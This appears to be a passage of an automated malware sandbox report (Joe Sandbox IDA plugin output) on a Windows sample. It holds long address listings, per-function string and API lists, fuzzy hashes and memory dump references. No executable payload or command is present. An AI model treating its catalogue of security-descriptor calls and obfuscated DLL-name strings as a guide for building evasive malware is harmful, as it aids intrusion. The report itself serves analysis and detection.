      0x008606a7
      0x008606ac
      0x008606b3
      0x008606bd
      0x008606bd
      0x008606c7
      0x008606d8
      0x008606e2
      0x008606e5
      0x008606ed
      0x008606fe
      0x0086070b
      0x00860714
      0x00860727
      0x00860727
      0x00860732
      0x00860735
      0x00860dbc
      0x00860dc6
      0x00860dcb
      0x00860dd1
      0x00860dd9
      0x00860ddc
      0x00860deb
      0x00860df0
      0x00860df6
      0x00860dfe
      0x00860e01
      0x00860e12
      0x00860e23
      0x00860e28
      0x00860e2e
      0x00860e36
      0x00860e39
      0x00860e4a
      0x00860e5b
      0x00860e60
      0x00860e66
      0x00860e6e
      0x00860e71
      0x00860e82
      0x00860e93
      0x00860e98
      0x00860e9e
      0x00860ea6
      0x00860ea9
      0x00860eba
      0x00860ecb
      0x00860ed0
      0x00860ed6
      0x00860ede
      0x00860ee1
      0x00860ef2
      0x00860f03
      0x00860f08
      0x00860f0e
      0x00860f16
      0x00860f19
      0x00860f2a
      0x00860f3b
      0x00860f40
      0x00860f46
      0x00860f4e
      0x00860f51
      0x00860f62
      0x00860f73
      0x00860f85
      0x00860f96
      0x00860f9b
      0x00860fa1
      0x00860fa9
      0x00860fac
      0x00860fbd
      0x00860fce
      0x00860fd3
      0x00860fd9
      0x00860fe1
      0x00860fe4
      0x00860ff5
      0x00861006
      0x0086100b
      0x00861011
      0x00861019
      0x0086101c
      0x0086102d
      0x0086103b
      0x00861046
      0x00861053
      0x0086105e
      0x00861069
      0x0086073b
      0x00860741
      0x0086074e
      0x00860759
      0x00860764
      0x00860769
      0x0086076f
      0x00860777
      0x0086077a
      0x00860789
      0x0086078e
      0x00860794
      0x0086079c
      0x0086079f
      0x008607b0
      0x008607c1
      0x008607c6
      0x008607cc
      0x008607d4
      0x008607d7
      0x008607e8
      0x008607f9
      0x0086080b
      0x0086081c
      0x00860821
      0x00860827
      0x0086082f
      0x00860832
      0x00860843
      0x00860854
      0x00860859
      0x0086085f
      0x00860867
      0x0086086a
      0x0086087b
      0x0086088c
      0x0086089e
      0x008608af
      0x008608b4
      0x008608ba
      0x008608c2
      0x008608c5
      0x008608d6
      0x008608e7
      0x008608ec
      0x008608f2
      0x008608fa
      0x008608fd
      0x0086090e
      0x0086091f
      0x00860924
      0x0086092a
      0x00860932
      0x00860935
      0x00860946
      0x00860957
      0x00860969
      0x0086097a
      0x0086097f
      0x00860985
      0x0086098d
      0x00860990
      0x008609a1
      0x008609b2
      0x008609b7
      0x008609bd
      0x008609c5
      0x008609c8
      0x008609d9
      0x008609ea
      0x008609ef
      0x008609f5
      0x008609fd
      0x00860a00
      0x00860a11
      0x00860a22
      0x00860a27
      0x00860a2d
      0x00860a35
      0x00860a38
      0x00860a49
      0x00860a5a
      0x00860a6c
      0x00860a7d
      0x00860a82
      0x00860a88
      0x00860a90
      0x00860a93
      0x00860aa4
      0x00860ab5
      0x00860aba
      0x00860ac0
      0x00860ac8
      0x00860acb
      0x00860adc
      0x00860aed
      0x00860af2
      0x00860af8
      0x00860b00
      0x00860b03
      0x00860b14
      0x00860b25
      0x00860b2a
      0x00860b30
      0x00860b38
      0x00860b3b
      0x00860b4c
      0x00860b5d
      0x00860b62
      0x00860b68
      0x00860b70
      0x00860b73
      0x00860b84
      0x00860b95
      0x00860b9a
      0x00860ba0
      0x00860ba8
      0x00860bab
      0x00860bbc
      0x00860bcd
      0x00860bd2
      0x00860bd8
      0x00860be0
      0x00860be3
      0x00860bf4
      0x00860c05
      0x00860c0a
      0x00860c10
      0x00860c18
      0x00860c1b
      0x00860c2c
      0x00860c3d
      0x00860c42
      0x00860c48
      0x00860c50
      0x00860c53
      0x00860c64
      0x00860c75
      0x00860c87
      0x00860c98
      0x00860c9d
      0x00860ca3
      0x00860cab
      0x00860cae
      0x00860cbf
      0x00860cd5
      0x00860cda
      0x00860ceb
      0x00860cf0
      0x00860cf6
      0x00860d06
      0x00860d0b
      0x00860d11
      0x00860d1e
      0x00860d23
      0x00860d29
      0x00860d41
      0x00860d46
      0x00860d5f
      0x00860d64
      0x00860d7d
      0x00860d93
      0x00860da1
      0x00860dae
      0x00860dae
      0x00860735
      0x00861074
      0x0086107f
      0x0086108a
      0x008610aa
      0x0086108c
      0x0086109d
      0x0086109d
      0x008610af
      0x008610b6
      0x008610c0
      0x008610c2
      0x008610c2
      0x008610c6
      0x008610cd
      0x008610d7
      0x008610d9
      0x008610d9
      0x008610dd
      0x008610e4
      0x008610ee
      0x008610f0
      0x008610f0
      0x00861102
      0x00861107
      0x00861120
      0x00861125
      0x0086113e
      0x00861143
      0x0086115c
      0x00861161
      0x0086117a
      0x0086117f
      0x00861193
      0x00861198
      0x008611b1
      0x008611b6
      0x008611cf
      0x008611d4
      0x008611ed
      0x008611f2
      0x00861206
      0x0086120b
      0x00861224
      0x00861229
      0x00861242
      0x00861247
      0x00861260
      0x00861265
      0x00861276
      0x00861290
      0x00861297
      0x0086129e
      0x008612a4
      0x008612ad
      0x008612b3
      0x008612be
      0x008612c3
      0x008612c8
      0x008612cf
      0x008612d6
      0x008612d8
      0x008612db
      0x008612e3
      0x008612e6
      0x008612ee
      0x008612f1
      0x008612fc
      0x00861301
      0x0086130c
      0x00861311
      0x00861316
      0x0086131b
      0x00861326
      0x00861326
      0x00861340
      0x00861342
      0x0086134c
      0x00861351
      0x0086135c
      0x00861361
      0x0086136c
      0x00861371
      0x00861376
      0x0086137b
      0x00861380
      0x00861385
      0x00861390
      0x00861390
      0x00861395
      0x008613aa
      0x008613af
      0x008613b4
      0x008613bb
      0x008613c0
      0x008613c5
      0x008613ca
      0x008613d1
      0x008613db
      0x008613db
      0x008613e2
      0x008613f3
      0x008613fe
      0x0086140a
      0x0086140c
      0x0086140e
      0x00861419
      0x0086141e
      0x00861429
      0x0086142e
      0x00861439
      0x0086143e
      0x00861443
      0x00861448
      0x00861450
      0x00861455
      0x0086145a
      0x0086145a
      0x0086145d
      0x0086145d
      0x008613e4
      0x008613e4
      0x008613ec
      0x008613ec
      0x00861462
      0x0086146a
      0x0086146f
      0x00861476
      0x00861480
      0x00861482
      0x00861482
      0x00861486
      0x0086148d
      0x00861497
      0x00861499
      0x00861499
      0x0086149d
      0x008614a4
      0x008614ae
      0x008614b0
      0x008614b0
      0x008614b4
      0x008614bb
      0x008614c5
      0x008614c7
      0x008614c7
      0x008614d9
      0x008614de
      0x008614f7
      0x008614fc
      0x00861515
      0x0086151a
      0x00861533
      0x00861538
      0x00861551
      0x00861556
      0x0086156a
      0x0086156f
      0x00861588
      0x0086158d
      0x008615a6
      0x008615ab
      0x008615bf
      0x008615c4
      0x008615dd
      0x008615e2
      0x008615fb
      0x00861600
      0x00861619
      0x0086161e
      0x00861632
      0x00861637
      0x00861650
      0x00861655
      0x0086166e
      0x00861673
      0x0086168c
      0x00861691
      0x008616aa
      0x008616af
      0x008616c0
      0x008616da
      0x008616e1
      0x008616e8
      0x008616ea
      0x008616ed
      0x008616f2
      0x008616fd
      0x008616fd
      0x00861708
      0x0086170d
      0x00861713
      0x00861722
      0x00861782
      0x0086178d
      0x0086179d
      0x008617a2
      0x008617ad
      0x008617b2
      0x008617bd
      0x008617c2
      0x008617c7
      0x008617cc
      0x008617d1
      0x008617d1
      0x008617d4
      0x00861724
      0x0086172c
      0x00861735
      0x0086173b
      0x00861746
      0x00861750
      0x00861753
      0x0086175b
      0x00861760
      0x0086176b
      0x00861770
      0x0086177b
      0x0086177b
      0x008617d9
      0x008617de
      0x008617e3
      0x008617e8
      0x008617ed
      0x008617f7
      0x008617fc
      0x00861801
      0x00861807
      0x00861809
      0x00861811
      0x00861816
      0x0086181e
      0x00861823
      0x0086182e
      0x00861833
      0x0086183f
      0x00861844
      0x0086184f
      0x00861854
      0x0086185c
      0x0086185c
      0x00861867
      0x00861867
      0x0086186c
      0x00861871
      0x0086187f
      0x00861893
      0x00861898
      0x00861898
      0x0086189e
      0x00861881
      0x00861881
      0x0086188c
      0x0086188c
      0x008618a3
      0x008618ab
      0x008618b1
      0x008618bc
      0x008618c7
      0x008618cc
      0x008618d3
      0x008618dd
      0x008618df
      0x008618df
      0x008618e3
      0x008618ea
      0x008618f4
      0x008618f6
      0x008618f6
      0x008618fa
      0x00861901
      0x0086190b
      0x0086190d
      0x0086190d
      0x0086191f
      0x00861924
      0x0086193d
      0x00861942
      0x0086195b
      0x00861960
      0x00861979
      0x0086197e
      0x00861997
      0x0086199c
      0x008619b0
      0x008619b5
      0x008619ce
      0x008619d3
      0x008619ec
      0x008619f1
      0x00861a0a
      0x00861a0f
      0x00861a28
      0x00861a2d
      0x00861a46
      0x00861a4b
      0x00861a5f
      0x00861a64
      0x00861a7d
      0x00861a82
      0x00861a9b
      0x00861aa0
      0x00861ab1
      0x00861acb
      0x00861ad2
      0x00861ad5
      0x00861ada
      0x00861adf
      0x00861ae6
      0x00861aed
      0x00861aef
      0x00861af4
      0x00861afb
      0x00861afd
      0x00861b06
      0x00861b0f
      0x00861b1a
      0x00861b1d
      0x00861b28
      0x00861b2d
      0x00861b37
      0x00861b46
      0x00861b4b
      0x00861b51
      0x00861b68
      0x00861b6f
      0x00861b74
      0x00861b84
      0x00861b89
      0x00861b90
      0x00861b9a
      0x00861b9c
      0x00861b9c
      0x00861ba0
      0x00861ba7
      0x00861bb1
      0x00861bb3
      0x00861bb3
      0x00861bb7
      0x00861bbe
      0x00861bc8
      0x00861bca
      0x00861bca
      0x00861bdc
      0x00861be1
      0x00861bfa
      0x00861bff
      0x00861c18
      0x00861c1d
      0x00861c36
      0x00861c3b
      0x00861c54
      0x00861c59
      0x00861c6d
      0x00861c72
      0x00861c8b
      0x00861c90
      0x00861ca9
      0x00861cae
      0x00861cc7
      0x00861ccc
      0x00861ce5
      0x00861cea
      0x00861d03
      0x00861d08
      0x00861d21
      0x00861d26
      0x00861d3a
      0x00861d3f
      0x00861d58
      0x00861d5d
      0x00861d76
      0x00861d7b
      0x00861d94
      0x00861d99
      0x00861daa
      0x00861dc4
      0x00861dc9
      0x00861dd0
      0x00861dda
      0x00861ddc
      0x00861ddc
      0x00861de0
      0x00861de7
      0x00861df1
      0x00861df3
      0x00861df3
      0x00861df7
      0x00861dfe
      0x00861e0e
      0x00861e10
      0x00861e10
      0x00861e17
      0x00861e1e
      0x00861e2e
      0x00861e30
      0x00861e30
      0x00861e37
      0x00861e3e
      0x00861e4e
      0x00861e50
      0x00861e50
      0x00861e65
      0x00861e6a
      0x00861e83
      0x00861e88
      0x00861ea1
      0x00861ea6
      0x00861eba
      0x00861ebf
      0x00861ed8
      0x00861edd
      0x00861ef6
      0x00861efb
      0x00861f14
      0x00861f19
      0x00861f32
      0x00861f37
      0x00861f50
      0x00861f55
      0x00861f6e
      0x00861f73
      0x00861f8a
      0x00861f8f
      0x00861fa8
      0x00861fad
      0x00861fc4
      0x00861fc9
      0x00861fe2
      0x00861fe7
      0x00862000
      0x00862005
      0x0086201e
      0x00862023
      0x0086203c
      0x00862041
      0x0086205a
      0x0086205f
      0x00862078
      0x0086207d
      0x00862094
      0x00862099
      0x008620aa
      0x008620c4
      0x008620cf
      0x008620d4
      0x008620db
      0x008625eb
      0x008625eb
      0x008625f2
      0x00862600
      0x00862602
      0x00862604
      0x00862604
      0x00862604
      0x00862604
      0x0086260b
      0x00862612
      0x00862620
      0x00862622
      0x00862624
      0x00862624
      0x00862624
      0x00862624
      0x0086262b
      0x00862632
      0x00862640
      0x00862642
      0x00862644
      0x00862644
      0x00862644
      0x00862644
      0x0086264b
      0x00862652
      0x00862660
      0x00862662
      0x00862664
      0x00862664
      0x00862664
      0x00862664
      0x0086266b
      0x00862672
      0x00862680
      0x00862682
      0x00862684
      0x00862684
      0x00862684
      0x00862684
      0x0086268b
      0x00862692
      0x008626a0
      0x008626a2
      0x008626a4
      0x008626a4
      0x008626a4
      0x008626a4
      0x008626bc
      0x008626c1
      0x008626da
      0x008626df
      0x008626f8
      0x008626fd
      0x00862714
      0x00862719
      0x00862732
      0x00862737
      0x00862750
      0x00862755
      0x0086276e
      0x00862773
      0x0086278a
      0x0086278f
      0x008627a8
      0x008627ad
      0x008627c6
      0x008627cb
      0x008627e4
      0x008627e9
      0x00862802
      0x00862807
      0x00862820
      0x00862825
      0x0086283e
      0x00862843
      0x0086285c
      0x00862861
      0x0086287a
      0x0086287f
      0x00862896
      0x0086289b
      0x008628b2
      0x008628b7
      0x008628ce
      0x008628d3
      0x008628ec
      0x008628f1
      0x0086290a
      0x0086290f
      0x00862928
      0x0086292d
      0x00862946
      0x0086294b
      0x00862964
      0x00862969
      0x00862982
      0x00862987
      0x008629a0
      0x008629a5
      0x008629be
      0x008629d4
      0x008629e2
      0x008629ed
      0x008629f8
      0x008629ff
      0x00862a00
      0x00862a05
      0x00862a08
      0x00862a0b
      0x00862a12
      0x00862a20
      0x00862a22
      0x00862a24
      0x00862a24
      0x00862a24
      0x00862a24
      0x00862a2b
      0x00862a32
      0x00862a40
      0x00862a42
      0x00862a44
      0x00862a44
      0x00862a44
      0x00862a44
      0x00862a4b
      0x00862a52
      0x00862a60
      0x00862a62
      0x00862a64
      0x00862a64
      0x00862a64
      0x00862a64
      0x00862a6b
      0x00862a72
      0x00862a80
      0x00862a82
      0x00862a84
      0x00862a84
      0x00862a84
      0x00862a84
      0x00862a8b
      0x00862a92
      0x00862aa0
      0x00862aa2
      0x00862aa4
      0x00862aa4
      0x00862aa4
      0x00862aa4
      0x00862aab
      0x00862ab2
      0x00862ac0
      0x00862ac2
      0x00862ac4
      0x00862ac4
      0x00862ac4
      0x00862ac4
      0x00862adc
      0x00862ae1
      0x00862af8
      0x00862afd
      0x00862b14
      0x00862b19
      0x00862b30
      0x00862b35
      0x00862b4c
      0x00862b51
      0x00862b68
      0x00862b6d
      0x00862b7e
      0x00862b83
      0x00862b94
      0x00862b99
      0x00862ba0
      0x00862bae
      0x00862bb0
      0x00862bb2
      0x00862bb2
      0x00862bb2
      0x00862bb2
      0x00862bb9
      0x00862bc0
      0x00862bce
      0x00862bd0
      0x00862bd2
      0x00862bd2
      0x00862bd2
      0x00862bd2
      0x00862bd9
      0x00862be0
      0x00862bee
      0x00862bf0
      0x00862bf2
      0x00862bf2
      0x00862bf2
      0x00862bf2
      0x00862bf9
      0x00862c00
      0x00862c0e
      0x00862c10
      0x00862c12
      0x00862c12
      0x00862c12
      0x00862c12
      0x00862c19
      0x00862c30
      0x00862c35
      0x00862c3b
      0x00862c51
      0x00862c56
      0x00862c6d
      0x00862c72
      0x00862c89
      0x00862c9f
      0x00862cad
      0x00862cb2
      0x00862cb4
      0x00862cb7
      0x00862cba
      0x00862cca
      0x008620e1
      0x008620e1
      0x008620e1
      0x008620ed
      0x00000000
      0x00000000
      0x008625e1
      0x008625e5
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x008625e5
      0x008620f9
      0x00862102
      0x0086210b
      0x00862110
      0x00862117
      0x00862127
      0x00862129
      0x00862129
      0x00862130
      0x00862137
      0x00862147
      0x00862149
      0x00862149
      0x00862150
      0x00862157
      0x00862167
      0x00862169
      0x00862169
      0x00862181
      0x00862186
      0x0086219f
      0x008621a4
      0x008621bd
      0x008621c2
      0x008621d9
      0x008621de
      0x008621f7
      0x008621fc
      0x00862215
      0x0086221a
      0x00862233
      0x00862238
      0x00862251
      0x00862256
      0x0086226f
      0x00862274
      0x0086228d
      0x00862292
      0x008622ab
      0x008622b0
      0x008622c9
      0x008622ce
      0x008622e5
      0x008622ea
      0x00862303
      0x00862308
      0x00862321
      0x00862337
      0x00862345
      0x00862350
      0x00862357
      0x00862358
      0x0086235d
      0x00862360
      0x00862363
      0x0086236a
      0x0086237a
      0x0086237c
      0x0086237c
      0x00862383
      0x0086238a
      0x0086239a
      0x0086239c
      0x0086239c
      0x008623a3
      0x008623aa
      0x008623ba
      0x008623bc
      0x008623bc
      0x008623bc
      0x008623bc
      0x008623d4
      0x008623d9
      0x008623f2
      0x008623f7
      0x00862410
      0x00862415
      0x0086242c
      0x00862431
      0x00862448
      0x0086244d
      0x0086245e
      0x00862463
      0x00862474
      0x00862479
      0x00862480
      0x00862490
      0x00862492
      0x00862492
      0x00862499
      0x008624a0
      0x008624b0
      0x008624b2
      0x008624b2
      0x008624b9
      0x008624c0
      0x008624d0
      0x008624d2
      0x008624d2
      0x008624d2
      0x008624d2
      0x008624d9
      0x008624f0
      0x008624f5
      0x0086250e
      0x00862513
      0x0086252c
      0x00862531
      0x0086254a
      0x0086254f
      0x00862566
      0x0086256b
      0x00862582
      0x00862587
      0x00862598
      0x008625ae
      0x008625bc
      0x008625c3
      0x008625c6
      0x008625c9
      0x008625d9
      0x008625d9
      0x008620db
      0x00000000
      0x0085e768
      0x0085e768
      0x0085e76a
      0x0085e76c
      0x0085e76d
      0x00000000
      0x0085e76f
      0x0085e76f
      0x0085e770
      0x0085e771
      0x0085e772
      0x0085e775
      0x0085e776
      0x0085e77b
      0x0085e77e
      0x0085e781
      0x0085e786
      0x0085e78d
      0x0085e797
      0x0085e797
      0x0085e79e
      0x0085ea0b
      0x0085e7a4
      0x0085e7aa
      0x0085e9b4
      0x0085e9bf
      0x0085e9c8
      0x0085e9d2
      0x0085e9dd
      0x0085e9e8
      0x0085e9f3
      0x0085e7b0
      0x0085e7b6
      0x0085e7bf
      0x0085e7c8
      0x0085e7d1
      0x0085e7da
      0x0085e7df
      0x0085e7e5
      0x0085e7ed
      0x0085e7f0
      0x0085e7ff
      0x0085e804
      0x0085e80a
      0x0085e812
      0x0085e815
      0x0085e826
      0x0085e837
      0x0085e83c
      0x0085e842
      0x0085e84a
      0x0085e84d
      0x0085e85e
      0x0085e86f
      0x0085e874
      0x0085e87a
      0x0085e882
      0x0085e885
      0x0085e896
      0x0085e8a7
      0x0085e8ac
      0x0085e8b2
      0x0085e8ba
      0x0085e8bd
      0x0085e8ce
      0x0085e8df
      0x0085e8f1
      0x0085e902
      0x0085e907
      0x0085e90d
      0x0085e915
      0x0085e918
      0x0085e929
      0x0085e93a
      0x0085e93f
      0x0085e945
      0x0085e94d
      0x0085e950
      0x0085e961
      0x0085e972
      0x0085e977
      0x0085e97d
      0x0085e985
      0x0085e988
      0x0085e999
      0x0085e9a7
      0x0085e9a7
      0x0085e9fe
      0x0085e9fe
      0x0085ea16
      0x0085ea21
      0x0085ea2f
      0x0085ed65
      0x0085ea35
      0x0085ea43
      0x0085ed0b
      0x0085ed16
      0x0085ed21
      0x0085ed37
      0x0085ed42
      0x0085ed58
      0x0085ea49
      0x0085ea4f
      0x0085ea62
      0x0085ea67
      0x0085ea6d
      0x0085ea75
      0x0085ea78
      0x0085ea87
      0x0085ea8c
      0x0085ea92
      0x0085ea9a
      0x0085ea9d
      0x0085eaae
      0x0085eabf
      0x0085eac4
      0x0085eaca
      0x0085ead2
      0x0085ead5
      0x0085eae6
      0x0085eaf7
      0x0085eafc
      0x0085eb02
      0x0085eb0a
      0x0085eb0d
      0x0085eb1e
      0x0085eb2f
      0x0085eb34
      0x0085eb3a
      0x0085eb42
      0x0085eb45
      0x0085eb56
      0x0085eb67
      0x0085eb6c
      0x0085eb72
      0x0085eb7a
      0x0085eb7d
      0x0085eb8e
      0x0085eb9f
      0x0085eba4
      0x0085ebaa
      0x0085ebb2
      0x0085ebb5
      0x0085ebc6
      0x0085ebd7
      0x0085ebdc
      0x0085ebe2
      0x0085ebea
      0x0085ebed
      0x0085ebfe
      0x0085ec0f
      0x0085ec21
      0x0085ec32
      0x0085ec37
      0x0085ec3d
      0x0085ec45
      0x0085ec48
      0x0085ec59
      0x0085ec6a
      0x0085ec6f
      0x0085ec75
      0x0085ec7d
      0x0085ec80
      0x0085ec91
      0x0085eca2
      0x0085eca7
      0x0085ecad
      0x0085ecb5
      0x0085ecb8
      0x0085ecc9
      0x0085ecd7
      0x0085ece2
      0x0085ecef
      0x0085ecfc
      0x0085ecfc
      0x0085ea43
      0x0085ed70
      0x0085ed80
      0x0085ed8a
      0x0085ed8a
      0x0085ed80
      0x00000000

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $,y`~$EP0NS411.DLL$FXSCOM.dll$IMEPADSM.DLL$NetLocalGroupGetInfo$NetSessionDel$NlsLexicons001a.dll$api-ms-win-crt-process-l1-1-0.dll$f3ahvoas.dll$mscat32.dll$secur32.dll$systemcpl.dll$wmpshell.dll$wow32.dll
      • API String ID: 0-3408819571
      • Opcode ID: eb116362f46ec99cb0b42e9def089c68c2e2ee596d9b925e802fe5509ede81fc
      • Instruction ID: 0f1591226680140fbd15c03a1ba7c1fbb519c8ba427debd44d09a04df11d47ff
      • Opcode Fuzzy Hash: eb116362f46ec99cb0b42e9def089c68c2e2ee596d9b925e802fe5509ede81fc
      • Instruction Fuzzy Hash: D7A38D3490929A8FDB11DF64D890BDCBBB2FF4A308F0050E6D488A7762D7356A99CF15
      Uniqueness

      Uniqueness Score: -1.00%

      Function 006BA8DC Relevance: 69.0, Strings: 52, Instructions: 3995COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $=$GetACP$GlobalReAlloc$J$KBDKAZ.DLL$Microsoft.Build.Framework.dll$Microsoft.Office.BusinessApplications.Runtime.intl.resources.dll$NetGetDisplayInformationIndex$NlsData001a.dll$NlsData0022.dll$PerfCounter.dll$PlaMig.dll$R$RtlCreateServiceSid$RtlQueryHeapInformation$System.Xml.dll$V$VarUI2FromCy$WMPEncEn.dll$WmiQueryAllDataA$XamlViewer_v0300.exe$acwow64.dll$api-ms-win-core-debug-l1-1-0.dll$api-ms-win-core-processthreads-l1-1-1.dll$api-ms-win-core-string-l1-1-0.dll$colorcpl.exe$comadmin.dll$evntcmd.exe$helpcins.dll$msctfui.dll$srcore.dll$wertyuiopasdfghjklzxcvbnm$wmiutils.dll$wudriver.dll
      • API String ID: 0-1618126529
      • Opcode ID: 10c136151ee4f2069b0dafc05781bd4c9fbc7b5384318e964855b9067dde7ae7
      • Instruction ID: e1bfc7529476952224456319fd71e6d4f0e63e04ef81fae256565360bd5caaf2
      • Opcode Fuzzy Hash: 10c136151ee4f2069b0dafc05781bd4c9fbc7b5384318e964855b9067dde7ae7
      • Instruction Fuzzy Hash: 44930274A0425D8FDB10DFA4DC81BDDBBF5FB09308F1090AAD408A7662E734AA89DF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0087C50C Relevance: 55.3, APIs: 6, Strings: 25, Instructions: 1075COMMON
      Download Yara Rule
      APIs
      • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,0087DC05,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8), ref: 0087C539
      • InitializeAcl.ADVAPI32(00000000,00000400,00000002,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8,0089B6AC), ref: 0087C637
      • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,00000074,?,0000000E,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?), ref: 0087C755
      • CreateWellKnownSid.ADVAPI32(00000001,00000000,?,00000074,00000006,008A9B84,00000006,008A9B7C,00000006,008A9A38,00000006,00000006,008A9B6C,00000006,00000006,008A9AF0), ref: 0087C90F
      • AddAccessAllowedAce.ADVAPI32(00000000,00000002,10000000,?,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?,00000074,008B08D8), ref: 0087C92C
      • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000,?,0000000E,?,00000000,00000000,?,0089A05A,EDBF3FA1,?,?,0089B6AC,?), ref: 0087C9A8
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID: CreateDescriptorInitializeKnownSecurityWell$AccessAllowedDacl
      • String ID: $ $ $ $ $ $,y`~$BdeHdCfg.exe$CallNextHookEx$D,y`$EnumerateTraceGuidsEx$GetEnabledXStateFeatures$KBDSMSNO.DLL$MessageBoxA$NlsLexicons0027.dll$NtThawRegistry$TSpkg.dll$TpCallbackUnloadDllOnCompletion$`$aepic.dll$api-ms-win-core-libraryloader-l1-1-0.dll$dwmapi.dll$logoncli.dll$netstandard.dll$rdpcorets.dll
      • API String ID: 2450134216-175671456
      • Opcode ID: 511310ba4730daa6851b64ac9285cd0dba335a4c9a7894692d693002ef960081
      • Instruction ID: 3992e1403e9b5c8776297243210fc0ecee483a309be43561978049566767cd83
      • Opcode Fuzzy Hash: 511310ba4730daa6851b64ac9285cd0dba335a4c9a7894692d693002ef960081
      • Instruction Fuzzy Hash: 6BB23534A1521DCFDB00EFA4D881BDDB7B6FF49304F108066E844B7695D738AA4ACB66
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0088C79C Relevance: 47.5, Strings: 36, Instructions: 2529COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ ^$D,y`$KBDUZB.DLL$PCLXL.DLL$RegGetValueW$System.Web.DynamicData.Design.dll$VariantCopyInd$dsprov.dll$dwmapi.dll$mmcshext.dll$raserver.exe$wow64.dll$wuapi.dll
      • API String ID: 0-2227730283
      • Opcode ID: 771b376b7f97c8601e1a52d5fcbe12d0c22f26bd464a0fa7d94e8ee5eb1d9979
      • Instruction ID: 507a208060b2461cba0364fdbe80c7954836aa0660f1ce3053646711b380dff6
      • Opcode Fuzzy Hash: 771b376b7f97c8601e1a52d5fcbe12d0c22f26bd464a0fa7d94e8ee5eb1d9979
      • Instruction Fuzzy Hash: 2E537E3490829E8FDB11DF64D890BDDBBB5BF0A308F1040E6D448B77A2D634AA99CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 008770C4 Relevance: 24.6, Strings: 19, Instructions: 835COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.253861052.000000000041A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.253812698.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257856954.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.257881367.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_file.jbxd
      Similarity
      • API ID:
      • String ID: $ $ $ $/$CasPol.exe$GetClassInfoExW$IMJPCLST.DLL$Microsoft.Build.Conversion.v3.5.dll$Microsoft.MediaCenter.iTV.dll$PostMig.exe$ZwReadOnlyEnlistment$cmi2migxml.dll$evntagnt.dll$msra.exe$secur32.dll$shwebsvc.dll$usercpl.dll$wpcmig.dll
      • API String ID: 0-598829326
      • Opcode ID: 5d5b376437f2a9b3a42bc52104574d10f0b344bae16a8f077b124a3af5015a8e
      • Instruction ID: 7c2c6b43ff34d7cd941693466faf59132d87e8d94f3068a3a5c03bd831f8545c
      • Opcode Fuzzy Hash: 5d5b376437f2a9b3a42bc52104574d10f0b344bae16a8f077b124a3af5015a8e
      • Instruction Fuzzy Hash: 7182E63491424E8FDB00DFA5C982BEEBBB5FF49304F108066E504B7295D734AE5ACB66
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0040CE84 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
      Download Yara Rule
